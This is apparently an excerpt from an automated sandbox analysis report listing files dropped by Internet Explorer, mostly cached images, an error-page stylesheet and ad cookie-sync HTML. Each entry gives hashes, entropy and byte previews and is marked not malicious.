                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j.....N..w.....Z......h..............H(..@....@.a@.#..g\.@...&M!.:........f.q.;..D.@..%.........p..4.C@.4....6......<..8..x.....".#<P..6..P..4G..&..c.7.q.....v.M.s.U\,t5D.@.......3@.@...P...m!.h..."j.e.(...@......p....l....t...#....&....f"..=.(..jr...@.{.Y"..@..7..&9..P.(....@.4.F..`..(.<.......P..$..}0..@#.(...."../ulZF.CRY.u.o.8.,V}3gj..=^.......a<....:.......f.P.y. .;x...PX..9
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgg4w[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                Category:dropped
                                                Size (bytes):34427
                                                Entropy (8bit):7.918466298596994
                                                Encrypted:false
                                                SSDEEP:768:I+HFDaHrcAEP0XopJxu7HSOGTD4GO23d7IGbKjfGZ:I+BaHTEP0+JxEHyDs23d8sKSZ
                                                MD5:8A893F65E7371978DBB67255A0EC14C2
                                                SHA1:E718E3AABA11B0D5879A00C27DAA901F93D2A7B5
                                                SHA-256:4DB575F619B4A904FA76FC2F85A217971B39FD20B61B3779C9D4FF6701984D44
                                                SHA-512:AD3D6E1A48D2F2E59B2516F563CB31E586BEE00C47F2B85E6B95D31ECDC77703FBA4E4A477EB5E4C98B3975195EBA296436DB03C25D49DEEEF774F886B13DF93
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..+B.*.@..E.(...4....FM... ....;.Z.\.LC....H...qC....C.Tc.W..w..<t.".Pc.1..\}..L`...R...E!...vn ..y85.#F...-...P.@......P.@......P.@....P.@....P.@....P.@....P.@....P.@....P.@.@....P.@....P...L....3@.@.h...yJ.V@.E........P..~8.._Z@H(.ni.t......i..8.....-.x... .P.L..r).qR..@.l.3..UnE1.........u.c6Ra..( ....@..-...P.@....P.@.@....P.@....P.@....P.@....P.@....P.@....P.@....P.@.@.......b..P
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOggwL[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                Category:dropped
                                                Size (bytes):12998
                                                Entropy (8bit):7.957875205331213
                                                Encrypted:false
                                                SSDEEP:384:bOhTptS/mgGPq4AQF+2SK2Fdtlr0voY49wNPci77P:bOhbSugGPq4zFotlr0uIP
                                                MD5:1D942C6E3EDD1A02F198321F9F653842
                                                SHA1:CB8A9BCC50B7001222AA6ED0070701A91E8D48E1
                                                SHA-256:8C71199E78444BF4AF8F2FB06A29084CB7A3B79605DC8C7027A01AE146BCDCC2
                                                SHA-512:245C76AFABA723A5F404DBEF1FDAA3A35B97D58B9C0A5AF4467D64E4821A0B8A9CF8BCF4E46145A9E39D224C996AC06A4D625BDF21C0DBD6C5C027B70AA3D37E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..:@...*9`M0.9.y....N2zR.(...4l.g?5&.p...].....d.D.0.T.J...%..,....(e!...iC...].....b....b....O..A..d4Ykg)...G1\..8\.....94i.S.N.6.e..7...X....X.r...}+D....&....@...G<u...]+\.<P..id..y$....++.......`.<..-......=j#.F5.4...G.cr.....ZZ....>l..;..Z...s.Z......`% .T.N0(...pN=..(...^.9..-...~.'..`RJ.B0:....n....O"n.....kJ7..IY....B...................P2._1C..Q-...M..:b.Y.H.....q.../..v
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgmIX[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
                                                Category:dropped
                                                Size (bytes):12089
                                                Entropy (8bit):7.904789531773816
                                                Encrypted:false
                                                SSDEEP:192:QtIaSD1Y9EN+brlhrr8hJ+sDbecdnERkmMtGLhsDmZrgnbLGKnVDXZJ/29qtJXmq:+IaSD1XEbYn+sDbecy/MtGLhrdWdX/2A
                                                MD5:545034BC80A1AACF34CC4EDC5C66F0F4
                                                SHA1:AB11903457FF4F7CCF18CD685EF33CD037BF1965
                                                SHA-256:AE3C9594D1A49BB4B2F04659BF6131D989BE980275C1E12DF7683A2FE804E4B9
                                                SHA-512:EBA05B272F6FF630B31551EC7508B470F18B1817B30988D74B1A80FB4C5BA220E153CBED4E9BE5FC6638B26178E80934F1A2872F69898FB33B916D86CB54E8FA
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..zb..Z.J.Z.(.h.(.....@...C...zS.6..R.>d>...".....p..h.....Y..QrUW$.).......f1K[Ye.d.....U...!...{.......P.t{y5e....vo.]RD...c..#s..g...Y..<)o#.....?...W.kH.{;.i...6...c_|f..Y=.J.l\X.......(..)\..(..P................ P.I&..(.h.......@......Z.(......(....Z.;S........)..1@.I4.C-.Jr...E."..2J.M..l..9..x.4.m..d.#..O...8V.N....R.6r.......g..l..[M[bH.$.......;=.....M.....(....(...
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgs0a[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                Category:dropped
                                                Size (bytes):13020
                                                Entropy (8bit):7.879416972104943
                                                Encrypted:false
                                                SSDEEP:384:N3pY6zGTzlrB4GOhxp1FCoQINdi52hZl+uuZj3os:N3pshEDpfChgi5YJGF
                                                MD5:3A0523D4AD4D5B3845A7FD0680E9288B
                                                SHA1:3510C6877C97E5B21141D3AD7DDD46F05E365054
                                                SHA-256:CE5C0C7C063D0C19DC10A6D8ACDFCCAB2623AB8A889147C11757BDA8A04E514F
                                                SHA-512:EE5922D8E1A257FD3504FEC129EA8CCA2CEFDE2798F5B2638045BBB4DF6671DEE93361A9773F59FC29B0DC534BC78762211BFB1758C8B3E8E16ED31FF7A0D4CD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....QB......]..m..m...`(L.....A..1@.(....(.q@...\P1@......b....-!.(....(.......qA..........OD..m..P.s.r..@.(3.......4..=.@..@."...0 QA#.@.(.qL..@...\P......b....m...0.P...\P.....(........(......(.........S.d..~f...j.)9.. .....i...)..P.E.V......b....(...(.q@...6.......1H.m0....h.m.....(.@...!...1@...(.........H...].....p..J.......... P1......P!.P..@...$p.....(..P..@..Hb.,..@....b...
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOguTA[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                Category:dropped
                                                Size (bytes):8913
                                                Entropy (8bit):7.92704245333277
                                                Encrypted:false
                                                SSDEEP:192:Qo4x+X1wBOZURMxGfEa2Nbe/e33DLBH86cg2w:bnXqB0sVEa2Y/03xH8zw
                                                MD5:6A4DF2C42DA5EA53EA4B3A6CD2EDB5D2
                                                SHA1:10B2E4A7F7730E8D6BF42F121D42432C26CFC089
                                                SHA-256:D33985B0529FA6B886C455C39EE3946F11CB18336F038C72BC710C6D36CFCF03
                                                SHA-512:062B790B4B455BE51348700A0065E5C35D13A14ECFADB4AFFBF51578FA03D77BB579D745C031FA84C0E612E30729E91FABB4D626178240A868F74F7C05782D39
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...4....P..R...^H..."....../v~?!@.W.$...........h..s..........5.M....9=.....R.W)4.......:;......,.!K.......Jv..p....:...r.n.Xu.CHd"....3..v&....!_.'pN..Z...I.v..Kk...........$.qh.".W.8>.D....(......J.(.JC..k0.u>....r.9..1.Mu.Y.........;..8....?.R.R...z.r...#.,O..k6.j.c...9f$....3.....RD.0I...{Qa\k..(....6'......6...#..h...FF>o.Z..q.....jC.%rs...>q....dw.....4.cwJ...U$..
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgvnc[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                Category:dropped
                                                Size (bytes):13697
                                                Entropy (8bit):7.848115090089445
                                                Encrypted:false
                                                SSDEEP:192:Q2W3xN4uVWuPUZ3taz4XwR6SrWyBOvf/MWnxdmYpCgco83DCFxPoCOS1YAOHJpwt:NW3xN4u8yUZ3Iz4XwR/mmn2FxP4AO0zX
                                                MD5:F4EFBC68289CAF3A7B9073AF2E9E0BD1
                                                SHA1:46C041D8BBC0AF52E388432795B49D050E7A0A43
                                                SHA-256:4EB34F73471CABFCBC78439D42AF69831807D25F5ACD8151559BED13139D8DE1
                                                SHA-512:BE7E716E94EF3FC30C33D62EE15851E0F7CF635197901C088446AEB3F2B1BF8CC20F7D5B4C2F055A478EB3E622ABE981C0CC3754C0B144E485D5ADC79D0B36A3
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..t...,(.B..P.P..v.0).]..4..u.<....W.f....P..y9....,.p.x=...j...F..Rk.iLJ2..;..R\I.....d..C...v...p. .|.!.}.qL....@...#.4.;.$z.`..q....... ..3....p98..d#.$P.RJ......1....1.Ua....N....^{.@...F.....P..^..2H.$.... &8....=.+.Uq...v..7$u.p.&..s@.Hga..q.s..B..@...}.h...=h.U.P(...g..T.....b......|....<.=(..K......q.EyQD.B...g.0*.!.<F..@.h.$X.....$.C.n...s.5....4V.^..O.C.......I=.:
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgzB2[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                Category:dropped
                                                Size (bytes):2573
                                                Entropy (8bit):7.808660714708082
                                                Encrypted:false
                                                SSDEEP:48:QfAuETAvMK8GJOxgUXMdjA2XZH+XN4zPdn82nVrnF4J:Qf7ETKlUfcdzpeXOzVnFnVruJ
                                                MD5:C32C7CC30144AC309E0FD9922D4611CA
                                                SHA1:441EFE87996A8CD7CB25D39054DDE0E3ED3AAEA5
                                                SHA-256:0242664F6C06D24F965A06EEFDCA3768D1F607B55B50D4FAEAF242244AD81540
                                                SHA-512:52A610FD596D00E94D21E4FD1A7D7D1708DC09BAC6C68C302367589DCC08FC9E65ECA2E396BFAE1AF2F9826057CF089C5A1778E4FD25DDF07C62DB52AD955A75
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(......(......(......(.+....%..m.B......|P.7[..$.>~..7.....x.}c..V.=....I..0.}.Oj..r.;...d....K.o...].w>1...;{.~..omF.....:0ea.A."......*.b..I4.++...=A.......(.+.x...@.J..Oph...|.......{TBa.....b>.c?wn..`..,0..iz...~FQ...T.%H.K...V......E.za....h..dH..w..j.YT..9.D._.=.5.....C..d.. .u....Eu:Z.Ms'.........Y...;.R.l........S(.+15ua.[.n"..7......pGq.y.ME4....R......x.......
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB15AQNm[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                Category:dropped
                                                Size (bytes):29565
                                                Entropy (8bit):7.9235998300887145
                                                Encrypted:false
                                                SSDEEP:384:I1cMsjB7+C2bbAEB2SUZRT+kXoMRRJhp5xvHapIzf7m41tgaYi9PIVKnHNVMP2Nm:IHsjkC2YEB2SUPTT48FPHTgf3VKn2Uc
                                                MD5:6B79D1438D8EFAF3B8DE6163107CEC71
                                                SHA1:E54E651A8A0FDAFCAD60B137D806D8CEC2F769C0
                                                SHA-256:2F00C9B0C23EE995091A90ACC7A8FA3AA773612A464F558D78664636C8B7B8D8
                                                SHA-512:745B822F9E21DB98B909F3AE762C439C376A35AD5C08655861B05539ACD5C47BCDCF24FAB2FB5A56712BC3BEDE6493FD5152E92D065AC5E9ECCE2DF93C4B78B7
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...4.m.!....4..i..4..l.C..u .pi....dRe#J..\..t..bC3.)..l.".W.#..&.....-&2.".&.(l..y...r...cE.7..h(#......t..E.....H.^b..../...5 ..r..4&R.>F.. ~..$..R.....1..WDV.L..j.^q..!...T.+..x.$.+._..<{Tc4!.^\$q.ZR`q...Y........A.Ld...(HM.....Z#2b.u40 ...J.F.j.*...Fy.."h..g.&...+H..$2...A....N.c.L...^..c...<Qa..[.. -..v.....-....xg.K.e+..'5[.... !@.ZM.b."....<.........~....(..".~
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1fdtSt[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):438
                                                Entropy (8bit):7.245257101036661
                                                Encrypted:false
                                                SSDEEP:12:6v/7DHVT2T6ESAN2ISAy22UaU8Pa7+/LB:4Tq0AN2IjyPaqV
                                                MD5:3F46112E8E54A82D0D7F8883CF12A86F
                                                SHA1:AA1A3340F167A655D0A0A087D0F6CBF98026296C
                                                SHA-256:E447211712478A81E419A9794678B6377AE3ACA057DEA78FC9EF6A971E652CFB
                                                SHA-512:EBBF357EF6B388E4BD1B261D51DE923D15DBF3AC4740874BEBDEF336BB8133C3B63AEA9D8D95D2D1A044F6E43B7DD654586661462C9239E4FFA6B8328E6B49A6
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+.....hIDATx...O+DQ../]....f..(,.,-.!.L..X..ee.,.. .I.D..h..P,&.|.c.L.i.E.{.k..~.}.}........t...W...*.5.2..0)X0I.c.wbU.....N..,....-F...J#lSq.;....a...*.....D .w.g..N.....F)l..........`_..s..A;?.4..+..ob......Qh.H.:A......(....;.z./..?.:...t.[.e..b.......{..t.A....M..0.>8&_"... Ev.Z`.."...=/..F.}X....#|.Ny. Z......W...{HX;..F..w..M:...?W.<4B..!.I.....l.o...s....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1kc8s[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):893
                                                Entropy (8bit):7.702979580339968
                                                Encrypted:false
                                                SSDEEP:24:5yrGVrpvzYKWJzgT7w2CGZi1/BwIBCHL/P:srG1pLYPJzY7w/G4OIKLH
                                                MD5:CD8DFD7D16B4BA3E2873EE06DB780B06
                                                SHA1:E8A79F0671D287E116C76FAA5F0E8A4099E0BD23
                                                SHA-256:88E6642487D0F944C6A020133CAE030781CFDCB518802419F10AD78937BDA6DF
                                                SHA-512:199AA29EF33317A43D1C6DF434DD5F9D0FF54BF363CCB1948A970C7EC6889B083565E85E0A140FCDFC38B675CA3EB24DEA0659897EF0450CEF43444E1CEFDA8B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR.............;0......pHYs..........+...../IDATx..]H.Q......LG.LW..Ha..:?.f_l...l.a..........z.a.e.=)....D...'c.E_...F.&).\...4....x...:...=..g.?.....>...'......b......I=.*.Z...V.o.....O........i4............9qjpWWW.P(|.T*M....}@0 ......Es .x...}.n..J.?....C(...V.UY[[.`........R.v..wvv........g.....v...H.....x......4.0..b.\v:.v\kN^'.`.....gb..y....FX,.y.J..............~.s..x<?.+...l6qYY..hT...A^^.....#.H....q}.^..r.o....WWW?....S.)...D..)..Qz.`0..f..T.t.VVV`ss.0:PQQ.MMM....p8...........`......H*..#'=......o.H$.......L&.,?..x.....(%.....c}.0DPPP@.3........t....=Xb.r.`aa......dr.E..u....6,.j-c;11......p8..(.LJ.d2..n..BaL...(..6.-...e..Z?.<...M...5hmm...|*..................`4.qjj....d$..CsQtLUUU.%.....N....Wn~~.:...=.........(===..$Z.......h4....$.c.q.LM...xgffl...r.O.........}....(.Y.{{{.+.2.M..8.P..89"g6...B.l..Z.....o.....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BBK9Hzy[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):480
                                                Entropy (8bit):7.323791813342231
                                                Encrypted:false
                                                SSDEEP:12:6v/7BusWIjbykLNgdQLPhgZPwb6txC3nUPuZZcb:MW6bykxgSh6a6TCStb
                                                MD5:163E7CEBA4224A9D25813CD756D138CC
                                                SHA1:062FFF66A1E7C37BAE1ECE635034A03C54638D50
                                                SHA-256:14525F17E552171DEE6D57C932287048185BE36D9AC25DA79CB02AD00657DEAF
                                                SHA-512:C37D77C1414B75CE6E3A90087B3C1E9D57AF6BCA4C140F1F4F43503D89C849EE1143315260A4DF92F1DD273305C15121FF199C04E946FA3BBD98B9B1D6636069
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+......IDATx..R=H.Q.}...?....!... ..0h.B......!!.......h.j.........%i.J..%.5.:.._c.u.x.=....wQ...?.L.\E..] ...O.&.m..l.U.z..M6.....9.....(....3...x.O!3.....o&}.........]*.w....x..s.%..4.E.WX..{..!....4...2hB...c.m...]m0W."Y.,.2n.W..P.U.a .p...f.\gV....:0.4e........^s 4.j..0...u..*..t6....v..4...c8.4...0./i.Dh..../[t..h.5...!E$.....+..r..C.v......T<.....S..*z#.:...p.B.....").}R........=.....w.e......IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\NewErrorPageTemplate[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1612
                                                Entropy (8bit):4.869554560514657
                                                Encrypted:false
                                                SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                MD5:DFEABDE84792228093A5A270352395B6
                                                SHA1:E41258C9576721025926326F76063C2305586F76
                                                SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\NewErrorPageTemplate[2]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1612
                                                Entropy (8bit):4.869554560514657
                                                Encrypted:false
                                                SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                MD5:DFEABDE84792228093A5A270352395B6
                                                SHA1:E41258C9576721025926326F76063C2305586F76
                                                SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[2].htm
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):21628
                                                Entropy (8bit):5.304819777739522
                                                Encrypted:false
                                                SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                                MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                                SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                                SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                                SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[3].htm
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):21628
                                                Entropy (8bit):5.304819777739522
                                                Encrypted:false
                                                SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                                MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                                SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                                SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                                SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                                Malicious:false
                                                Reputation:unknown
